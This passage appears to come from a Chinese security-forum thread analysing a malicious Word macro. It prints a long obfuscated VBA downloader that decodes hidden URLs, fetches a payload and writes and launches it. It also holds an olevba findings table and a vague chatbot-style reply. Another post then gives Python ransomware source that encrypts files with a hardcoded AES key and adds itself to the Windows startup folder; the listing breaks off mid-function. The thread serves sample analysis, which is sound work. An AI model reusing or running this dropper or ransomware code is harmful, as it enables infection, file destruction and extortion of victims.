  858. mbhdyUmq(39) = 62
  859. mbhdyUmq(40) = 30
  860. mbhdyUmq(41) = 4
  861. mbhdyUmq(42) = 37
  862. mbhdyUmq(43) = 46
  863. mbhdyUmq(44) = 94
  864. mbhdyUmq(45) = 237
  865. mbhdyUmq(46) = 60
  866. mbhdyUmq(47) = 20
  867. mbhdyUmq(48) = 82
  868. PJFGr = pr(ITzmrW, mbhdyUmq, HAtmQd)
  869. Dim otuI As String
  870. Dim FBB As String
  871. Dim Gt(139) As Long
  872. Dim AwHbW As Long
  873. AwHbW = 47
  874. FBB = "kQrPmnzpA/cPSuhYuLmePHRyLLsyvwcUSHwcApBbvFNQpwPrQqDutYoCztViisyeynbmP:YOJCxZlfYDtlkYzasykfeaIpSxHZEeOZSggMtqLqpoNhLCN/zKSbYwGDxFPqnw/tsgYFTakVmeYXmTpjhAwOVabszOLqbSyfGKqqGESzixBUOGLH.sNodmvUANjwZUvaCpVrWbPsmLGsTenXnCsnyIfAYULTWlYJutNp/gDVcOLbdYUOCHJYBGhnlljPOMXkXyoekuQErfnYzZXOPWlkAYnBwquVPftWRz.DlGruQ/bcYScCseeZUFfVrZ"
  875. Gt(0) = 15
  876. Gt(1) = 53
  877. Gt(2) = 53
  878. Gt(3) = 8
  879. Gt(4) = 70
  880. Gt(5) = 10
  881. Gt(6) = 10
  882. Gt(7) = 6
  883. Gt(8) = 20
  884. Gt(9) = 30
  885. Gt(10) = 27
  886. Gt(11) = 183
  887. Gt(12) = 11
  888. Gt(13) = 55
  889. Gt(14) = 60
  890. Gt(15) = 6
  891. Gt(16) = 183
  892. Gt(17) = 27
  893. Gt(18) = 14
  894. Gt(19) = 10
  895. Gt(20) = 8
  896. Gt(21) = 20
  897. Gt(22) = 3
  898. Gt(23) = 27
  899. Gt(24) = 55
  900. Gt(25) = 6
  901. Gt(26) = 86
  902. Gt(27) = 77
  903. Gt(28) = 10
  904. Gt(29) = 72
  905. Gt(30) = 7
  906. Gt(31) = 27
  907. Gt(32) = 24
  908. Gt(33) = 56
  909. Gt(34) = 24
  910. Gt(35) = 51
  911. Gt(36) = 42
  912. Gt(37) = 56
  913. Gt(38) = 78
  914. Gt(39) = 9
  915. Gt(40) = 43
  916. Gt(41) = 39
  917. Gt(42) = 4
  918. Gt(43) = 43
  919. Gt(44) = 29
  920. Gt(45) = 22
  921. Gt(46) = 10
  922. Gt(47) = 296
  923. Gt(48) = 41
  924. Gt(49) = 90
  925. Gt(50) = 295
  926. Gt(51) = 155
  927. Gt(52) = 180
  928. Gt(53) = 226
  929. Gt(54) = 49
  930. Gt(55) = 261
  931. Gt(56) = 28
  932. Gt(57) = 282
  933. Gt(58) = 56
  934. Gt(59) = 36
  935. Gt(60) = 230
  936. Gt(61) = 70
  937. Gt(62) = 218
  938. Gt(63) = 170
  939. Gt(64) = 211
  940. Gt(65) = 33
  941. Gt(66) = 235
  942. Gt(67) = 5
  943. Gt(68) = 243
  944. Gt(69) = 27
  945. Gt(70) = 2
  946. Gt(71) = 109
  947. Gt(72) = 244
  948. Gt(73) = 123
  949. Gt(74) = 215
  950. Gt(75) = 69
  951. Gt(76) = 85
  952. Gt(77) = 278
  953. Gt(78) = 240
  954. Gt(79) = 220
  955. Gt(80) = 201
  956. Gt(81) = 230
  957. Gt(82) = 318
  958. Gt(83) = 172
  959. Gt(84) = 27
  960. Gt(85) = 104
  961. Gt(86) = 197
  962. Gt(87) = 319
  963. Gt(88) = 284
  964. Gt(89) = 117
  965. Gt(90) = 49
  966. Gt(91) = 256
  967. Gt(92) = 19
  968. Gt(93) = 84
  969. Gt(94) = 284
  970. Gt(95) = 120
  971. Gt(96) = 277
  972. Gt(97) = 122
  973. Gt(98) = 99
  974. Gt(99) = 139
  975. Gt(100) = 218
  976. Gt(101) = 270
  977. Gt(102) = 186
  978. Gt(103) = 106
  979. Gt(104) = 102
  980. Gt(105) = 246
  981. Gt(106) = 22
  982. Gt(107) = 243
  983. Gt(108) = 43
  984. Gt(109) = 126
  985. Gt(110) = 33
  986. Gt(111) = 218
  987. Gt(112) = 292
  988. Gt(113) = 54
  989. Gt(114) = 115
  990. Gt(115) = 205
  991. Gt(116) = 15
  992. Gt(117) = 70
  993. Gt(118) = 41
  994. Gt(119) = 133
  995. Gt(120) = 192
  996. Gt(121) = 62
  997. Gt(122) = 39
  998. Gt(123) = 235
  999. Gt(124) = 137
  1000. Gt(125) = 88
  1001. Gt(126) = 319
  1002. Gt(127) = 208
  1003. Gt(128) = 180
  1004. Gt(129) = 266
  1005. Gt(130) = 254
  1006. Gt(131) = 127
  1007. Gt(132) = 254
  1008. Gt(133) = 91
  1009. Gt(134) = 250
  1010. Gt(135) = 225
  1011. Gt(136) = 300
  1012. Gt(137) = 27
  1013. Gt(138) = 115
  1014. otuI = pr(FBB, Gt, AwHbW)
  1015. Dim yOe As String
  1016. Dim Zkeul As String
  1017. Dim KMXKGruJ(93) As Long
  1018. Dim ZpBiMUZR As Long
  1019. ZpBiMUZR = 35
  1020. Zkeul = "PuWYUNf2rvnOQbXVySEmgUJokoAFVFiAcmSLkDT/VhPGoqaGkYfjWdKAcEgFXiJdRIRbXDtxhJYrObzK:tZcEUAfzpkpyKpCjFinRVmJmRsAnVIIMzxbfr9gFDTGlTPryBriHSJItTSOaIUVjJfpc/TB/BHQXwvhtTekIvU4PMu4LO/UfLSviN.rkAbMfhHQqrMcuh7lWTrKUdeGLlwINBisSAeJRMnnAECZjIfpeAbWwQLBOPBvCscJsGkmBlOmiiRmj/CTCcKnYUMriBVeNFKFALwk"
  1021. KMXKGruJ(0) = 42
  1022. KMXKGruJ(1) = 71
  1023. KMXKGruJ(2) = 71
  1024. KMXKGruJ(3) = 90
  1025. KMXKGruJ(4) = 107
  1026. KMXKGruJ(5) = 81
  1027. KMXKGruJ(6) = 40
  1028. KMXKGruJ(7) = 40
  1029. KMXKGruJ(8) = 90
  1030. KMXKGruJ(9) = 47
  1031. KMXKGruJ(10) = 9
  1032. KMXKGruJ(11) = 11
  1033. KMXKGruJ(12) = 47
  1034. KMXKGruJ(13) = 107
  1035. KMXKGruJ(14) = 183
  1036. KMXKGruJ(15) = 9
  1037. KMXKGruJ(16) = 163
  1038. KMXKGruJ(17) = 11
  1039. KMXKGruJ(18) = 71
  1040. KMXKGruJ(19) = 40
  1041. KMXKGruJ(20) = 163
  1042. KMXKGruJ(21) = 14
  1043. KMXKGruJ(22) = 33
  1044. KMXKGruJ(23) = 33
  1045. KMXKGruJ(24) = 119
  1046. KMXKGruJ(25) = 199
  1047. KMXKGruJ(26) = 168
  1048. KMXKGruJ(27) = 163
  1049. KMXKGruJ(28) = 8
  1050. KMXKGruJ(29) = 168
  1051. KMXKGruJ(30) = 40
  1052. KMXKGruJ(31) = 27
  1053. KMXKGruJ(32) = 44
  1054. KMXKGruJ(33) = 6
  1055. KMXKGruJ(34) = 40
  1056. KMXKGruJ(35) = 204
  1057. KMXKGruJ(36) = 139
  1058. KMXKGruJ(37) = 223
  1059. KMXKGruJ(38) = 257
  1060. KMXKGruJ(39) = 26
  1061. KMXKGruJ(40) = 281
  1062. KMXKGruJ(41) = 32
  1063. KMXKGruJ(42) = 178
  1064. KMXKGruJ(43) = 216
  1065. KMXKGruJ(44) = 156
  1066. KMXKGruJ(45) = 140
  1067. KMXKGruJ(46) = 140
  1068. KMXKGruJ(47) = 96
  1069. KMXKGruJ(48) = 269
  1070. KMXKGruJ(49) = 74
  1071. KMXKGruJ(50) = 4
  1072. KMXKGruJ(51) = 10
  1073. KMXKGruJ(52) = 218
  1074. KMXKGruJ(53) = 59
  1075. KMXKGruJ(54) = 62
  1076. KMXKGruJ(55) = 213
  1077. KMXKGruJ(56) = 120
  1078. KMXKGruJ(57) = 67
  1079. KMXKGruJ(58) = 16
  1080. KMXKGruJ(59) = 206
  1081. KMXKGruJ(60) = 55
  1082. KMXKGruJ(61) = 92
  1083. KMXKGruJ(62) = 249
  1084. KMXKGruJ(63) = 183
  1085. KMXKGruJ(64) = 248
  1086. KMXKGruJ(65) = 242
  1087. KMXKGruJ(66) = 153
  1088. KMXKGruJ(67) = 98
  1089. KMXKGruJ(68) = 167
  1090. KMXKGruJ(69) = 257
  1091. KMXKGruJ(70) = 167
  1092. KMXKGruJ(71) = 20
  1093. KMXKGruJ(72) = 201
  1094. KMXKGruJ(73) = 33
  1095. KMXKGruJ(74) = 92
  1096. KMXKGruJ(75) = 27
  1097. KMXKGruJ(76) = 113
  1098. KMXKGruJ(77) = 14
  1099. KMXKGruJ(78) = 52
  1100. KMXKGruJ(79) = 179
  1101. KMXKGruJ(80) = 177
  1102. KMXKGruJ(81) = 175
  1103. KMXKGruJ(82) = 74
  1104. KMXKGruJ(83) = 217
  1105. KMXKGruJ(84) = 41
  1106. KMXKGruJ(85) = 243
  1107. KMXKGruJ(86) = 76
  1108. KMXKGruJ(87) = 57
  1109. KMXKGruJ(88) = 28
  1110. KMXKGruJ(89) = 87
  1111. KMXKGruJ(90) = 172
  1112. KMXKGruJ(91) = 261
  1113. KMXKGruJ(92) = 43
  1114. yOe = pr(Zkeul, KMXKGruJ, ZpBiMUZR)
  1115. Dim dIU As String
  1116. Dim gPRlt As String
  1117. Dim SucrD(80) As Long
  1118. Dim OCCkoy As Long
  1119. OCCkoy = 34
  1120. gPRlt = "YZDIpXHNMKmEHRRyEABNXyNTodyrJaDkqzdkaaxTX.rNLoQjBpsAdpzEoQdmHehIIGRjKLsMEkfyxQQyaCxmEPntIUF/bbLSBzghxAPBuRLGVuLrLwzZ/Xjgs-rljrDSmevCqihTnmcjdQettoKYDlFJiQnYF/TaDiSwNtfCvuVsPdrOC/omSlCyQbvFyLiON:X/yISGir"
  1121. SucrD(0) = 63
  1122. SucrD(1) = 88
  1123. SucrD(2) = 88
  1124. SucrD(3) = 5
  1125. SucrD(4) = 51
  1126. SucrD(5) = 194
  1127. SucrD(6) = 92
  1128. SucrD(7) = 92
  1129. SucrD(8) = 11
  1130. SucrD(9) = 25
  1131. SucrD(10) = 26
  1132. SucrD(11) = 62
  1133. SucrD(12) = 28
  1134. SucrD(13) = 87
  1135. SucrD(14) = 122
  1136. SucrD(15) = 139
  1137. SucrD(16) = 134
  1138. SucrD(17) = 88
  1139. SucrD(18) = 16
  1140. SucrD(19) = 42
  1141. SucrD(20) = 93
  1142. SucrD(21) = 16
  1143. SucrD(22) = 92
  1144. SucrD(23) = 93
  1145. SucrD(24) = 134
  1146. SucrD(25) = 88
  1147. SucrD(26) = 28
  1148. SucrD(27) = 134
  1149. SucrD(28) = 39
  1150. SucrD(29) = 92
  1151. SucrD(30) = 19
  1152. SucrD(31) = 25
  1153. SucrD(32) = 131
  1154. SucrD(33) = 92
  1155. SucrD(34) = 53
  1156. SucrD(35) = 149
  1157. SucrD(36) = 125
  1158. SucrD(37) = 14
  1159. SucrD(38) = 195
  1160. SucrD(39) = 11
  1161. SucrD(40) = 165
  1162. SucrD(41) = 50
  1163. SucrD(42) = 134
  1164. SucrD(43) = 20
  1165. SucrD(44) = 0
  1166. SucrD(45) = 100
  1167. SucrD(46) = 3
  1168. SucrD(47) = 163
  1169. SucrD(48) = 98
  1170. SucrD(49) = 65
  1171. SucrD(50) = 38
  1172. SucrD(51) = 90
  1173. SucrD(52) = 131
  1174. SucrD(53) = 140
  1175. SucrD(54) = 17
  1176. SucrD(55) = 194
  1177. SucrD(56) = 72
  1178. SucrD(57) = 70
  1179. SucrD(58) = 104
  1180. SucrD(59) = 73
  1181. SucrD(60) = 164
  1182. SucrD(61) = 64
  1183. SucrD(62) = 0
  1184. SucrD(63) = 132
  1185. SucrD(64) = 27
  1186. SucrD(65) = 69
  1187. SucrD(66) = 134
  1188. SucrD(67) = 152
  1189. SucrD(68) = 86
  1190. SucrD(69) = 63
  1191. SucrD(70) = 42
  1192. SucrD(71) = 47
  1193. SucrD(72) = 84
  1194. SucrD(73) = 127
  1195. SucrD(74) = 199
  1196. SucrD(75) = 119
  1197. SucrD(76) = 12
  1198. SucrD(77) = 56
  1199. SucrD(78) = 41
  1200. SucrD(79) = 110
  1201. dIU = pr(gPRlt, SucrD, OCCkoy)

  1202.     Dim xZkQItJ As String
  1203. Dim CVF As String
  1204. Dim VcKB(6) As Long
  1205. Dim GtHpK As Long
  1206. GtHpK = 4
  1207. CVF = "GjiULRcE.LhrcmhptazJsAMuv"
  1208. VcKB(0) = 9
  1209. VcKB(1) = 17
  1210. VcKB(2) = 14
  1211. VcKB(3) = 16
  1212. VcKB(4) = 22
  1213. VcKB(5) = 2
  1214. xZkQItJ = pr(CVF, VcKB, GtHpK)

  1215.     CbZSwqt = qjo()
  1216.     CbZSwqt = CbZSwqt & xZkQItJ

  1217.     Dim Fj As Boolean

  1218.     If Not Fj Then
  1219. Fj = D(VRSXo, CbZSwqt)
  1220. End If
  1221. If Not Fj Then
  1222. Fj = D(jKE, CbZSwqt)
  1223. End If
  1224. If Not Fj Then
  1225. Fj = D(yYUzJZ, CbZSwqt)
  1226. End If
  1227. If Not Fj Then
  1228. Fj = D(DXWzKLjH, CbZSwqt)
  1229. End If
  1230. If Not Fj Then
  1231. Fj = D(PJFGr, CbZSwqt)
  1232. End If
  1233. If Not Fj Then
  1234. Fj = D(otuI, CbZSwqt)
  1235. End If
  1236. If Not Fj Then
  1237. Fj = D(yOe, CbZSwqt)
  1238. End If
  1239. If Not Fj Then
  1240. Fj = D(dIU, CbZSwqt)
  1241. End If

  1242.     If Fj Then
  1243.         QCSHsGFQ CbZSwqt
  1244.     End If

  1245. End Sub


  1246. Sub hBGuN(BhSUcUN As Object)

  1247.     Dim Kvuu As String
  1248. Dim ufZfxPwO As String
  1249. Dim QI(7) As Long
  1250. Dim E As Long
  1251. E = 4
  1252. ufZfxPwO = "enepXkcDOdGv"
  1253. QI(0) = 9
  1254. QI(1) = 4
  1255. QI(2) = 1
  1256. QI(3) = 2
  1257. QI(4) = 8
  1258. QI(5) = 11
  1259. QI(6) = 5
  1260. Kvuu = pr(ufZfxPwO, QI, E)

  1261.     CallByName BhSUcUN, Kvuu, 1

  1262. End Sub


  1263. Sub jzIOj(lrea As Object, SiI As String)

  1264.     Dim ToQjsE As String
  1265. Dim QsZl As String
  1266. Dim MJCFthAJ(19) As Long
  1267. Dim qqNCh As Long
  1268. qqNCh = 10
  1269. QsZl = "sDrBlBLeeicoCzFSlkuuJtQwewuheYqgmXnPerGclEqe"
  1270. MJCFthAJ(0) = 2
  1271. MJCFthAJ(1) = 8
  1272. MJCFthAJ(2) = 5
  1273. MJCFthAJ(3) = 8
  1274. MJCFthAJ(4) = 22
  1275. MJCFthAJ(5) = 8
  1276. MJCFthAJ(6) = 15
  1277. MJCFthAJ(7) = 10
  1278. MJCFthAJ(8) = 5
  1279. MJCFthAJ(9) = 8
  1280. MJCFthAJ(10) = 44
  1281. MJCFthAJ(11) = 6
  1282. MJCFthAJ(12) = 26
  1283. MJCFthAJ(13) = 8
  1284. MJCFthAJ(14) = 7
  1285. MJCFthAJ(15) = 22
  1286. MJCFthAJ(16) = 13
  1287. MJCFthAJ(17) = 16
  1288. MJCFthAJ(18) = 7
  1289. ToQjsE = pr(QsZl, MJCFthAJ, qqNCh)

  1290.     CallByName lrea, ToQjsE, 1, SiI

  1291. End Sub


  1292. Function D(zkRFxWh As String, SiI As String) As Boolean
  1293.     Dim tbyVw As Object
  1294.     Dim MUPRWLe As Object
  1295.     Dim JLo As Object
  1296.     Dim B As Object
  1297.     Dim JGKirK As String
  1298.     Dim WIk As String
  1299.     Dim lpQnB() As Byte
  1300.     Dim XE As Integer
  1301.     Dim PDeb As String
  1302.     Dim QLlbT As String

  1303.     D = False

  1304.     Dim jZtJn As String
  1305. Dim wp As String
  1306. Dim sVZbNgFN(3) As Long
  1307. Dim pkjafpJ As Long
  1308. pkjafpJ = 1
  1309. wp = "VG?hD"
  1310. sVZbNgFN(0) = 3
  1311. sVZbNgFN(1) = 2
  1312. sVZbNgFN(2) = 5
  1313. jZtJn = pr(wp, sVZbNgFN, pkjafpJ)

  1314.     JGKirK = u()

  1315.     WIk = zkRFxWh & jZtJn & JGKirK

  1316.     On Error GoTo Kv

  1317.     Set tbyVw = qUiTDZ()

  1318.     LBKrarO tbyVw, WIk
  1319.     tN tbyVw

  1320.     If ghLpxhF(tbyVw) Then
  1321.         lpQnB = gIbhZ(tbyVw)

  1322.         XE = aNZKxNaj(lpQnB)

  1323.         If XE = 1 Then

  1324.             CAOdfE lpQnB, SiI
  1325.             D = True

  1326.         End If

  1327.         If XE = 2 Then

  1328.             Set JLo = Z()

  1329.             PDeb = qjo()

  1330.             oqfhkd JLo, PDeb

  1331.             Dim PeUeaIpu As String
  1332. Dim HctuI As String
  1333. Dim JLE(12) As Long
  1334. Dim aazg As Long
  1335. aazg = 4
  1336. HctuI = "PkIRTDZoThziSCzy.zPkLjnOKzVlZAGpnr"
  1337. JLE(0) = 17
  1338. JLE(1) = 11
  1339. JLE(2) = 12
  1340. JLE(3) = 32
  1341. JLE(4) = 21
  1342. JLE(5) = 28
  1343. JLE(6) = 33
  1344. JLE(7) = 22
  1345. JLE(8) = 32
  1346. JLE(9) = 30
  1347. JLE(10) = 24
  1348. JLE(11) = 16
  1349. PeUeaIpu = pr(HctuI, JLE, aazg)

  1350.             QLlbT = PDeb & PeUeaIpu

  1351.             CAOdfE lpQnB, QLlbT

  1352.             Set B = VTcbvVF()
  1353.             Set ZnAxw = LaILj(B, PDeb)
  1354.             Set Pe = LaILj(B, QLlbT)

  1355.             Dim THQ As String
  1356. Dim ULhTS As String
  1357. Dim VLj(23) As Long
  1358. Dim ANlvtYoi As Long
  1359. ANlvtYoi = 8
  1360. ULhTS = "opryYzjyUzJSNedYKOxHjhRitDXGoIlegJGemttoHTqlDaZnKCurePnfHeMu"
  1361. VLj(0) = 50
  1362. VLj(1) = 1
  1363. VLj(2) = 2
  1364. VLj(3) = 4
  1365. VLj(4) = 20
  1366. VLj(5) = 14
  1367. VLj(6) = 3
  1368. VLj(7) = 14
  1369. VLj(8) = 45
  1370. VLj(9) = 44
  1371. VLj(10) = 37
  1372. VLj(11) = 26
  1373. VLj(12) = 35
  1374. VLj(13) = 50
  1375. VLj(14) = 40
  1376. VLj(15) = 29
  1377. VLj(16) = 4
  1378. VLj(17) = 55
  1379. VLj(18) = 46
  1380. VLj(19) = 53
  1381. VLj(20) = 40
  1382. VLj(21) = 7
  1383. VLj(22) = 49
  1384. THQ = pr(ULhTS, VLj, ANlvtYoi)

  1385.             CallByName ZnAxw, THQ, 1, Pe.Items

  1386.             Dim YWLlwh As String
  1387. Dim ooGaSZWf As String
  1388. Dim Koq(11) As Long
  1389. Dim FePz As Long
  1390. FePz = 8
  1391. ooGaSZWf = "rqTYmQIciiLpoBkRuQTrlOvMUcfgoMzpxROhekBTFLheHTNzXexR"
  1392. Koq(0) = 24
  1393. Koq(1) = 13
  1394. Koq(2) = 23
  1395. Koq(3) = 37
  1396. Koq(4) = 41
  1397. Koq(5) = 9
  1398. Koq(6) = 21
  1399. Koq(7) = 37
  1400. Koq(8) = 44
  1401. Koq(9) = 20
  1402. Koq(10) = 46
  1403. YWLlwh = pr(ooGaSZWf, Koq, FePz)

  1404.             For Each QKZaWZ In ZnAxw.Items
  1405.                 CallByName JLo, YWLlwh, 1, QKZaWZ.Path, SiI
  1406.             Next

  1407.             CjT JLo, PDeb
  1408.             jzIOj JLo, QLlbT

  1409.             D = True

  1410.         End If

  1411.     End If

  1412.     Exit Function

  1413. Kv:

  1414.     D = False

  1415. End Function


  1416. Sub oqfhkd(lrea As Object, SiI As String)

  1417.     Dim KkIxbK As String
  1418. Dim MWNl As String
  1419. Dim acq(28) As Long
  1420. Dim ffeBgVUS As Long
  1421. ffeBgVUS = 12
  1422. MWNl = "eVgmNmSbfqrhleVCjCvWItWraNpeoycCOdcdAgcKLzeZQtzXzBCeTaFzrlOyF"
  1423. acq(0) = 16
  1424. acq(1) = 11
  1425. acq(2) = 1
  1426. acq(3) = 25
  1427. acq(4) = 22
  1428. acq(5) = 1
  1429. acq(6) = 55
  1430. acq(7) = 29
  1431. acq(8) = 13
  1432. acq(9) = 34
  1433. acq(10) = 1
  1434. acq(11) = 11
  1435. acq(12) = 7
  1436. acq(13) = 22
  1437. acq(14) = 59
  1438. acq(15) = 59
  1439. acq(16) = 34
  1440. acq(17) = 4
  1441. acq(18) = 44
  1442. acq(19) = 46
  1443. acq(20) = 8
  1444. acq(21) = 12
  1445. acq(22) = 5
  1446. acq(23) = 14
  1447. acq(24) = 61
  1448. acq(25) = 13
  1449. acq(26) = 19
  1450. acq(27) = 22
  1451. KkIxbK = pr(MWNl, acq, ffeBgVUS)

  1452.     CallByName lrea, KkIxbK, 1, SiI

  1453. End Sub


  1454. Function pr(juNePiRf As String, JVH() As Long, Bl As Long) As String
  1455.     Dim tLVrBirm As String
  1456.     Dim MMlhQseh As Variant

  1457.     Bl = Bl - 1

  1458.     For RRvrpn = 0 To Bl
  1459.         MMlhQseh = Mid(juNePiRf, JVH(RRvrpn), 1)
  1460.         tLVrBirm = tLVrBirm & MMlhQseh
  1461.     Next RRvrpn

  1462.     pr = tLVrBirm
  1463. End Function


  1464. Sub CAOdfE(CXWA() As Byte, SiI As String)

  1465.     Dim MUPRWLe As Object

  1466.     Set MUPRWLe = zHKj()

  1467.     hBGuN MUPRWLe
  1468.     AFnjkvGv MUPRWLe
  1469.     TdkwXDaK MUPRWLe, CXWA
  1470.     pJyZ MUPRWLe, SiI
  1471.     oblIkmg MUPRWLe

  1472. End Sub


  1473. Function qUiTDZ() As Object

  1474.     Dim QMNba As String
  1475. Dim BACtJz As String
  1476. Dim rmEHO(29) As Long
  1477. Dim Ro As Long
  1478. Ro = 17
  1479. BACtJz = "cRovpWplYzNXatPdscMVhLsHxRYYKUVoHAYVW.KoawAKwrMNKLyPjxYuXbxoiedcNrWHicduDFJNZvPFCQLEgvTuMtVQHVOsXTLSjvuEKvrGtjJTPxfHkzMwtiXqugmgpQOi"
  1480. rmEHO(0) = 19
  1481. rmEHO(1) = 61
  1482. rmEHO(2) = 1
  1483. rmEHO(3) = 46
  1484. rmEHO(4) = 3
  1485. rmEHO(5) = 17
  1486. rmEHO(6) = 3
  1487. rmEHO(7) = 115
  1488. rmEHO(8) = 14
  1489. rmEHO(9) = 38
  1490. rmEHO(10) = 12
  1491. rmEHO(11) = 19
  1492. rmEHO(12) = 22
  1493. rmEHO(13) = 24
  1494. rmEHO(14) = 87
  1495. rmEHO(15) = 87
  1496. rmEHO(16) = 15
  1497. rmEHO(17) = 126
  1498. rmEHO(18) = 69
  1499. rmEHO(19) = 51
  1500. rmEHO(20) = 21
  1501. rmEHO(21) = 20
  1502. rmEHO(22) = 22
  1503. rmEHO(23) = 33
  1504. rmEHO(24) = 58
  1505. rmEHO(25) = 85
  1506. rmEHO(26) = 31
  1507. rmEHO(27) = 75
  1508. rmEHO(28) = 57
  1509. QMNba = pr(BACtJz, rmEHO, Ro)

  1510.     Set qUiTDZ = LPNiApw(QMNba)

  1511. End Function


  1512. Function VTcbvVF() As Object

  1513.     Dim GsaeRgMb As String
  1514. Dim vDx As String
  1515. Dim LbXFksV(42) As Long
  1516. Dim xCZxcX As Long
  1517. xCZxcX = 17
  1518. vDx = "mtOynJu.TjjaLXIoLpeFiyoyhpTlierrlxcOlKUYMEtfXtgifBIWTDpFYSlmZuIsoTujeVivnsghnNOllTZeZeHAFLmhuyuvhBFpqZfFjUlEFc"
  1519. LbXFksV(0) = 58
  1520. LbXFksV(1) = 25
  1521. LbXFksV(2) = 19
  1522. LbXFksV(3) = 28
  1523. LbXFksV(4) = 28
  1524. LbXFksV(5) = 8
  1525. LbXFksV(6) = 88
  1526. LbXFksV(7) = 18
  1527. LbXFksV(8) = 18
  1528. LbXFksV(9) = 28
  1529. LbXFksV(10) = 21
  1530. LbXFksV(11) = 35
  1531. LbXFksV(12) = 12
  1532. LbXFksV(13) = 2
  1533. LbXFksV(14) = 21
  1534. LbXFksV(15) = 16
  1535. LbXFksV(16) = 5
  1536. LbXFksV(17) = 57
  1537. LbXFksV(18) = 98
  1538. LbXFksV(19) = 16
  1539. LbXFksV(20) = 61
  1540. LbXFksV(21) = 7
  1541. LbXFksV(22) = 102
  1542. LbXFksV(23) = 51
  1543. LbXFksV(24) = 10
  1544. LbXFksV(25) = 76
  1545. LbXFksV(26) = 78
  1546. LbXFksV(27) = 63
  1547. LbXFksV(28) = 87
  1548. LbXFksV(29) = 0
  1549. LbXFksV(30) = 104
  1550. LbXFksV(31) = 39
  1551. LbXFksV(32) = 68
  1552. LbXFksV(33) = 23
  1553. LbXFksV(34) = 96
  1554. LbXFksV(35) = 102
  1555. LbXFksV(36) = 84
  1556. LbXFksV(37) = 66
  1557. LbXFksV(38) = 63
  1558. LbXFksV(39) = 83
  1559. LbXFksV(40) = 5
  1560. LbXFksV(41) = 100
  1561. GsaeRgMb = pr(vDx, LbXFksV, xCZxcX)

  1562.     Set VTcbvVF = LPNiApw(GsaeRgMb)

  1563. End Function


  1564. Function ghLpxhF(HZRXwXl As Object) As Boolean

  1565.     Dim Tq As Long

  1566.     Dim OJGB As String
  1567. Dim etBzEP As String
  1568. Dim QpxUHU(7) As Long
  1569. Dim qfTuNGO As Long
  1570. qfTuNGO = 6
  1571. etBzEP = "aHpYMfsfDeyijHOJrjZhiHIftKFtHQuMoJsuQDDonEsNIViixVLQSW"
  1572. QpxUHU(0) = 53
  1573. QpxUHU(1) = 25
  1574. QpxUHU(2) = 1
  1575. QpxUHU(3) = 25
  1576. QpxUHU(4) = 31
  1577. QpxUHU(5) = 7
  1578. QpxUHU(6) = 37
  1579. OJGB = pr(etBzEP, QpxUHU, qfTuNGO)

  1580.     Tq = CallByName(HZRXwXl, OJGB, 2)

  1581.     If Tq = 200 Then
  1582.         ghLpxhF = True
  1583.     End If

  1584. End Function

  1585. +----------+--------------------+---------------------------------------------+
  1586. |Type      |Keyword             |Description                                  |
  1587. +----------+--------------------+---------------------------------------------+
  1588. |AutoExec  |AutoOpen            |Runs when the Word document is opened        |
  1589. |Suspicious|CreateObject        |May create an OLE object                     |
  1590. |Suspicious|CallByName          |May attempt to obfuscate malicious function  |
  1591. |          |                    |calls                                        |
  1592. |Suspicious|Base64 Strings      |Base64-encoded strings were detected, may be |
  1593. |          |                    |used to obfuscate strings (option --decode to|
  1594. |          |                    |see all)                                     |
  1595. +----------+--------------------+---------------------------------------------+
复制代码

看样子是通过数组和base64来释放文件,本人没学过vba,谁分析一下?(话说上次那个样本olevba竟然分析不出来宏?真奇怪)
117054487
发表于 2023-3-13 21:28:59 | 显示全部楼层
python无名氏 发表于 2023-3-13 21:12
宏代码:
看样子是通过数组和base64来释放文件,本人没学过vba,谁分析一下?(话说上次那个样本olevba竟然 ...

上次那个文件是被卡巴斯基修复过的,这个帖子才是原文件
huangzihang
发表于 2023-3-13 21:33:40 | 显示全部楼层
python无名氏 发表于 2023-3-13 21:12
宏代码:
看样子是通过数组和base64来释放文件,本人没学过vba,谁分析一下?(话说上次那个样本olevba竟然 ...

这是一段VBA代码,由多个函数和子过程组成。具体的功能无法确定,因为代码中使用了一些加密和混淆技术,例如字符替换、加密字符串、函数命名混淆等,使得代码难以理解。

根据代码中的一些标识符和函数名,可能涉及到文件操作、对象创建、字符串处理等方面的功能。但是,这段代码也可能是恶意软件或者病毒的一部分,因此使用时需要谨慎。建议查看代码的来源和使用环境,以免造成安全问题。
python无名氏
发表于 2023-3-13 21:37:37 | 显示全部楼层
huangzihang 发表于 2023-3-13 21:33
这是一段VBA代码,由多个函数和子过程组成。具体的功能无法确定,因为代码中使用了一些加密和混淆技术, ...

出现了,标准的chatgpt话术!
帮我问一下这些代码:
  1. import os,sys
  2. import base64
  3. import random
  4. import tkinter as tk
  5. import getpass
  6. import time
  7. from Crypto.Cipher import AES
  8. from tkinter import messagebox as me
  9. key = b'1145141919810pythonhnmpythonbest'
  10. ID = random.randint(100000,1000000)
  11. user = getpass.getuser()
  12. sDAHAdEAF = open(r'C:/PyRansom.bat','w')
  13. sDAHAdEAF.write('[url=home.php?mod=space&uid=331734]@echo[/url] off\r\ncopy '+sys.executable+' C:\PyRansom.exe\r\nexit')
  14. sDAHAdEAF.close()
  15. def en(file):
  16.     global key
  17.     filef = open(file,'rb+')
  18.     plaintext = filef.read()# 明文
  19.     filef.close()
  20.     cipher = AES.new(key, AES.MODE_EAX)
  21.     nonce = cipher.nonce
  22.     wn = open('decrypt.dky','wb+')
  23.     wn.write(nonce)
  24.     wn.close()
  25.     ciphertext, tag = cipher.encrypt_and_digest(plaintext)
  26.     filef = open(file,'wb+')
  27.     filef.write(ciphertext)
  28.     filef.close()
  29. # 解密方
  30. def de(file,ID_file):
  31.     global key
  32.     noncef = open(ID_file,'rb+')
  33.     nonce = noncef.read()
  34.     noncef.close()
  35.     cipher = AES.new(key, AES.MODE_EAX, nonce=nonce)
  36.     ciphertextt = open(file,'rb+')
  37.     ciphertext = ciphertextt.read()
  38.     ciphertextt.close()
  39.     plaintext = cipher.decrypt(ciphertext)
  40.     #cipher.verify(tag)  # 验证真实性
  41.     filef = open(file,'wb+')
  42.     filef.write(plaintext)
  43.     filef.close()
  44.     os.remove(ID_file)
  45. try:
  46.     checkc = open(f'C:/Users/{user}/Documents/change.txt','r')
  47.     change = int(checkc.read())
  48.     checkc.close()
  49. except:
  50.     change = 5
  51. try:
  52.     copy = open(f'C:/Users/{user}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PyRansom.bat','w')
  53.     copy.write('@echo off\r\nstart C:\PyRansom.exe')
  54.     copy.close()
  55. except:
  56.     pass
  57. def jing():
  58.     global user
  59.     try:
  60.         filess = open(f'C:/Users/{user}/Documents/tkmgr.reg','w')
